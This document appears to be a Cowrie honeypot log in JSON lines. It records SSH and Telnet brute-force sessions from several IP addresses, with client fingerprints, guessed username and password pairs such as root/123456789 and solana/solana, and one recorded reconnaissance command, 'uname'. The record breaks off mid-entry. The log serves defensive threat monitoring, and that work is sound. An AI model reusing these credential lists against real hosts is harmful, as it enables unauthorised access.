{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:23:36.320370Z","src_ip":"83.168.105.65","session":"6ad87e62db91"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-26T12:23:36.443208Z","src_ip":"83.168.105.65","session":"6ad87e62db91"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:23:37.485913Z","src_ip":"83.168.105.65","session":"6ad87e62db91"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":44238,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c524633fe75","protocol":"ssh","message":"New connection: 83.168.105.65:44238 (1.2.3.4:22) [session: 7c524633fe75]","sensor":"my-vps","timestamp":"2025-08-26T12:23:51.450502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:23:51.451544Z","src_ip":"83.168.105.65","session":"7c524633fe75"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:23:51.488279Z","src_ip":"83.168.105.65","session":"7c524633fe75"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:23:51.600190Z","src_ip":"83.168.105.65","session":"7c524633fe75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:23:51.744479Z","src_ip":"83.168.105.65","session":"7c524633fe75"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:23:51.745142Z","src_ip":"83.168.105.65","session":"7c524633fe75"}
{"eventid":"cowrie.session.connect","src_ip":"119.196.136.174","src_port":46015,"dst_ip":"1.2.3.4","dst_port":23,"session":"6bd596e07bb9","protocol":"telnet","message":"New connection: 119.196.136.174:46015 (1.2.3.4:23) [session: 6bd596e07bb9]","sensor":"my-vps","timestamp":"2025-08-26T12:23:51.766857Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:23:51.783166Z","src_ip":"83.168.105.65","session":"7c524633fe75"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:23:51.784227Z","src_ip":"83.168.105.65","session":"7c524633fe75"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41978,"dst_ip":"1.2.3.4","dst_port":22,"session":"91e7ed8c75bf","protocol":"ssh","message":"New connection: 83.168.105.65:41978 (1.2.3.4:22) [session: 91e7ed8c75bf]","sensor":"my-vps","timestamp":"2025-08-26T12:24:06.717804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:24:06.718753Z","src_ip":"83.168.105.65","session":"91e7ed8c75bf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:24:06.760589Z","src_ip":"83.168.105.65","session":"91e7ed8c75bf"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:24:06.883378Z","src_ip":"83.168.105.65","session":"91e7ed8c75bf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:24:06.987732Z","src_ip":"83.168.105.65","session":"91e7ed8c75bf"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:24:06.988521Z","src_ip":"83.168.105.65","session":"91e7ed8c75bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:24:07.034767Z","src_ip":"83.168.105.65","session":"91e7ed8c75bf"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:24:07.035966Z","src_ip":"83.168.105.65","session":"91e7ed8c75bf"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33724,"dst_ip":"1.2.3.4","dst_port":22,"session":"16488d6f8732","protocol":"ssh","message":"New connection: 83.168.105.65:33724 (1.2.3.4:22) [session: 16488d6f8732]","sensor":"my-vps","timestamp":"2025-08-26T12:24:21.850633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:24:21.851489Z","src_ip":"83.168.105.65","session":"16488d6f8732"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:24:21.888979Z","src_ip":"83.168.105.65","session":"16488d6f8732"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123","message":"login attempt [es/es123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:24:22.001719Z","src_ip":"83.168.105.65","session":"16488d6f8732"}
{"eventid":"cowrie.session.closed","duration":30.43765687942505,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:24:22.204463Z","src_ip":"119.196.136.174","session":"6bd596e07bb9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:24:23.041740Z","src_ip":"83.168.105.65","session":"16488d6f8732"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:24:34.234324Z","src_ip":"212.227.235.229","session":"0683bb09c069"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":48134,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5f0823eec99","protocol":"ssh","message":"New connection: 83.168.105.65:48134 (1.2.3.4:22) [session: a5f0823eec99]","sensor":"my-vps","timestamp":"2025-08-26T12:24:36.812706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:24:36.813483Z","src_ip":"83.168.105.65","session":"a5f0823eec99"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:24:36.850283Z","src_ip":"83.168.105.65","session":"a5f0823eec99"}
{"eventid":"cowrie.login.failed","username":"sugi","password":"sugi","message":"login attempt [sugi/sugi] failed","sensor":"my-vps","timestamp":"2025-08-26T12:24:36.962174Z","src_ip":"83.168.105.65","session":"a5f0823eec99"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:24:38.003049Z","src_ip":"83.168.105.65","session":"a5f0823eec99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58578,"dst_ip":"1.2.3.4","dst_port":22,"session":"291a7152475b","protocol":"ssh","message":"New connection: 212.227.235.229:58578 (1.2.3.4:22) [session: 291a7152475b]","sensor":"my-vps","timestamp":"2025-08-26T12:27:21.600960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:27:21.605725Z","src_ip":"212.227.235.229","session":"291a7152475b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T12:27:21.807844Z","src_ip":"212.227.235.229","session":"291a7152475b"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:27:29.607184Z","src_ip":"212.227.235.229","session":"291a7152475b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56056,"dst_ip":"1.2.3.4","dst_port":22,"session":"174ea3c46e50","protocol":"ssh","message":"New connection: 217.72.205.35:56056 (1.2.3.4:22) [session: 174ea3c46e50]","sensor":"my-vps","timestamp":"2025-08-26T12:29:10.548034Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:29:10.549175Z","src_ip":"217.72.205.35","session":"174ea3c46e50"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":49740,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c46f4566032","protocol":"ssh","message":"New connection: 45.88.8.186:49740 (1.2.3.4:22) [session: 5c46f4566032]","sensor":"my-vps","timestamp":"2025-08-26T12:29:26.021484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:29:26.646543Z","src_ip":"45.88.8.186","session":"5c46f4566032"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:29:26.647266Z","src_ip":"45.88.8.186","session":"5c46f4566032"}
{"eventid":"cowrie.login.success","username":"root","password":"464646","message":"login attempt [root/464646] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:29:30.412690Z","src_ip":"45.88.8.186","session":"5c46f4566032"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:29:31.300272Z","src_ip":"45.88.8.186","session":"5c46f4566032"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56542,"dst_ip":"1.2.3.4","dst_port":22,"session":"b48fcabc05c6","protocol":"ssh","message":"New connection: 212.227.125.160:56542 (1.2.3.4:22) [session: b48fcabc05c6]","sensor":"my-vps","timestamp":"2025-08-26T12:30:11.651381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:30:11.652431Z","src_ip":"212.227.125.160","session":"b48fcabc05c6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:30:11.703364Z","src_ip":"212.227.125.160","session":"b48fcabc05c6"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-08-26T12:30:11.858164Z","src_ip":"212.227.125.160","session":"b48fcabc05c6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:30:12.911506Z","src_ip":"212.227.125.160","session":"b48fcabc05c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46818,"dst_ip":"1.2.3.4","dst_port":23,"session":"d4cf411a7dd4","protocol":"telnet","message":"New connection: 212.227.125.160:46818 (1.2.3.4:23) [session: d4cf411a7dd4]","sensor":"my-vps","timestamp":"2025-08-26T12:30:57.223640Z"}
{"eventid":"cowrie.session.closed","duration":12.336798191070557,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:31:09.560367Z","src_ip":"212.227.125.160","session":"d4cf411a7dd4"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":44066,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0ad0a94ab7a","protocol":"telnet","message":"New connection: 79.124.8.120:44066 (1.2.3.4:23) [session: b0ad0a94ab7a]","sensor":"my-vps","timestamp":"2025-08-26T12:32:12.981019Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:32:13.021377Z","src_ip":"79.124.8.120","session":"b0ad0a94ab7a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:32:13.049868Z","src_ip":"79.124.8.120","session":"b0ad0a94ab7a"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":42162,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbd3e1e9c855","protocol":"ssh","message":"New connection: 45.88.8.215:42162 (1.2.3.4:22) [session: bbd3e1e9c855]","sensor":"my-vps","timestamp":"2025-08-26T12:32:21.379167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:32:22.125182Z","src_ip":"45.88.8.215","session":"bbd3e1e9c855"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@o